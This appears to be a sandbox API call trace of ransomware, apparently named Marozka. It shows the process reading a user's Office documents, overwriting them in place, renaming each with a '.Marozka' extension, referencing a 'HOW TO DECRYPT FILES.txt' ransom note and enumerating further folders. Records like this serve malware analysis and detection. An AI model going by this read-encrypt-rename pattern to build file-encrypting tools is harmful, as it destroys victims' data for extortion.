CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jsww.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.318] GetFileType (hFile=0x2e0) returned 0x1 [0053.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0053.318] GetFileType (hFile=0x2e0) returned 0x1 [0053.319] WriteFile (in: hFile=0x2e0, lpBuffer=0x26604cc*, nNumberOfBytesToWrite=0xc020, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x26604cc*, lpNumberOfBytesWritten=0x5be9c8*=0xc020, lpOverlapped=0x0) returned 1 [0053.320] CloseHandle (hObject=0x2e0) returned 1 [0053.329] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls", lpFilePart=0x0) returned 0x34 [0053.329] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls.Marozka", lpFilePart=0x0) returned 0x3c [0053.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0053.329] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jsww.xls"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x182959d0, ftCreationTime.dwHighDateTime=0x1d4cf30, ftLastAccessTime.dwLowDateTime=0xdbb49f0, ftLastAccessTime.dwHighDateTime=0x1d4c6e7, ftLastWriteTime.dwLowDateTime=0xe2854f7d, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc020)) returned 1 [0053.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0053.329] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jsww.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jsww.xls.marozka")) returned 1 [0053.330] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc", lpFilePart=0x0) returned 0x38 [0053.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0053.331] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\m gblzti.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.331] GetFileType (hFile=0x2e0) returned 0x1 [0053.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0053.331] GetFileType (hFile=0x2e0) returned 0x1 [0053.331] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xacf9 [0053.331] ReadFile (in: hFile=0x2e0, lpBuffer=0x266ca08, nNumberOfBytesToRead=0xacf9, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x266ca08*, lpNumberOfBytesRead=0x5be9d4*=0xacf9, lpOverlapped=0x0) returned 1 [0053.331] CloseHandle (hObject=0x2e0) returned 1 [0053.494] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0053.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0053.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0053.494] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc", lpFilePart=0x0) returned 0x38 [0053.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0053.494] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\m gblzti.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.495] GetFileType (hFile=0x2e0) returned 0x1 [0053.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0053.495] GetFileType (hFile=0x2e0) returned 0x1 [0053.496] WriteFile (in: hFile=0x2e0, lpBuffer=0x26da064*, nNumberOfBytesToWrite=0xad00, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x26da064*, lpNumberOfBytesWritten=0x5be9c8*=0xad00, lpOverlapped=0x0) returned 1 [0053.497] CloseHandle (hObject=0x2e0) returned 1 [0053.499] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc", lpFilePart=0x0) returned 0x38 [0053.499] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc.Marozka", lpFilePart=0x0) returned 0x40 [0053.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0053.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\m gblzti.doc"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66365f70, ftCreationTime.dwHighDateTime=0x1d4cdae, ftLastAccessTime.dwLowDateTime=0x356d6ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf55, ftLastWriteTime.dwLowDateTime=0xe29f1b7b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xad00)) returned 1 [0053.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0053.500] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\m gblzti.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\M GbLZti.doc.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\m gblzti.doc.marozka")) returned 1 [0053.500] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt", lpFilePart=0x0) returned 0x40 [0053.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0053.501] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\vcyy04bjxi9tml4n.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.501] GetFileType (hFile=0x2e0) returned 0x1 [0053.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0053.501] GetFileType (hFile=0x2e0) returned 0x1 [0053.501] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xf386 [0053.501] ReadFile (in: hFile=0x2e0, lpBuffer=0x26e52c8, nNumberOfBytesToRead=0xf386, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x26e52c8*, lpNumberOfBytesRead=0x5be9d4*=0xf386, lpOverlapped=0x0) returned 1 [0053.501] CloseHandle (hObject=0x2e0) returned 1 [0053.582] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0053.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0053.582] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0053.582] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt", lpFilePart=0x0) returned 0x40 [0053.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0053.582] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\vcyy04bjxi9tml4n.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.584] GetFileType (hFile=0x2e0) returned 0x1 [0053.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0053.584] GetFileType (hFile=0x2e0) returned 0x1 [0053.584] WriteFile (in: hFile=0x2e0, lpBuffer=0x275fb78*, nNumberOfBytesToWrite=0xf390, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x275fb78*, lpNumberOfBytesWritten=0x5be9c8*=0xf390, lpOverlapped=0x0) returned 1 [0053.586] CloseHandle (hObject=0x2e0) returned 1 [0053.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt", lpFilePart=0x0) returned 0x40 [0053.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt.Marozka", lpFilePart=0x0) returned 0x48 [0053.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0053.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\vcyy04bjxi9tml4n.ppt"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2e5cc0, ftCreationTime.dwHighDateTime=0x1d4d3ea, ftLastAccessTime.dwLowDateTime=0xa10c91d0, ftLastAccessTime.dwHighDateTime=0x1d4cd6a, ftLastWriteTime.dwLowDateTime=0xe2ab079c, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xf390)) returned 1 [0053.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0053.589] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\vcyy04bjxi9tml4n.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\vCyY04BJxI9TMl4N.ppt.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\vcyy04bjxi9tml4n.ppt.marozka")) returned 1 [0053.590] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc", lpFilePart=0x0) returned 0x44 [0053.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0053.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\_8s 4j8ywezb4lqes_v-.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.590] GetFileType (hFile=0x2e0) returned 0x1 [0053.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0053.590] GetFileType (hFile=0x2e0) returned 0x1 [0053.590] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xc7d2 [0053.590] ReadFile (in: hFile=0x2e0, lpBuffer=0x276f4fc, nNumberOfBytesToRead=0xc7d2, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x276f4fc*, lpNumberOfBytesRead=0x5be9d4*=0xc7d2, lpOverlapped=0x0) returned 1 [0053.591] CloseHandle (hObject=0x2e0) returned 1 [0053.672] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0053.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0053.672] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0053.673] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc", lpFilePart=0x0) returned 0x44 [0053.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0053.673] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\_8s 4j8ywezb4lqes_v-.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.675] GetFileType (hFile=0x2e0) returned 0x1 [0053.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0053.675] GetFileType (hFile=0x2e0) returned 0x1 [0053.675] WriteFile (in: hFile=0x2e0, lpBuffer=0x27e1a9c*, nNumberOfBytesToWrite=0xc7e0, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x27e1a9c*, lpNumberOfBytesWritten=0x5be9c8*=0xc7e0, lpOverlapped=0x0) returned 1 [0053.677] CloseHandle (hObject=0x2e0) returned 1 [0053.690] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc", lpFilePart=0x0) returned 0x44 [0053.690] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc.Marozka", lpFilePart=0x0) returned 0x4c [0053.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0053.690] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\_8s 4j8ywezb4lqes_v-.doc"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d39b90, ftCreationTime.dwHighDateTime=0x1d4d015, ftLastAccessTime.dwLowDateTime=0xf24d1e00, ftLastAccessTime.dwHighDateTime=0x1d4c65f, ftLastWriteTime.dwLowDateTime=0xe2bc0a0a, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc7e0)) returned 1 [0053.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0053.690] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\_8s 4j8ywezb4lqes_v-.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\_8s 4j8yWEzb4LqeS_v-.doc.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\_8s 4j8ywezb4lqes_v-.doc.marozka")) returned 1 [0053.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0053.691] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Music", lpFilePart=0x0) returned 0x22 [0053.691] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xffffffff [0053.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab8) returned 1 [0054.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0054.325] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Pictures", lpFilePart=0x0) returned 0x25 [0054.325] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xffffffff [0054.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab8) returned 1 [0054.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0054.327] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes", lpFilePart=0x0) returned 0x23 [0054.327] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d988 [0054.328] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.328] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.328] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.328] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.328] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0054.329] FindClose (in: hFindFile=0xa7d988 | out: hFindFile=0xa7d988) returned 1 [0054.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0054.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0054.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0054.329] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes", lpFilePart=0x0) returned 0x23 [0054.329] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d708 [0054.329] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.329] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.329] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.329] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.330] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0054.330] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0054.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0054.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0054.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0054.330] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x2c [0054.330] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d708 [0054.331] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0054.331] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0054.331] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0054.331] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0054.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0054.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0054.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0054.331] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x2c [0054.331] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d708 